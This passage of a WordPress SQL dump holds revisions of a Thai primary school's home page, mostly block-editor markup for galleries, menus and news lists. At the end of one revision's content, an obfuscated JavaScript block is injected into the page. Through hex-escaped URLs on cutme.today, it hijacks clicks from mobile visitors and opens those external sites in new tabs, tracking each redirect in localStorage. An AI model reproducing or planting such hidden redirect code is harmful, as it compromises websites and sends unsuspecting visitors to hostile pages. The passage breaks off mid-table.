{\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"taxotermfSize\":{\"md\":12}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 11:15:51','2024-07-27 04:15:51','',14,'http://pakhaeng.ssk.in.th/?p=85',0,'revision','',0),
(87,1,'2024-07-27 11:16:42','2024-07-27 04:16:42','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":180},\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#0a71ad\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"readmoreBgColor\":\"#0a71ad\",\"readmoreMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" 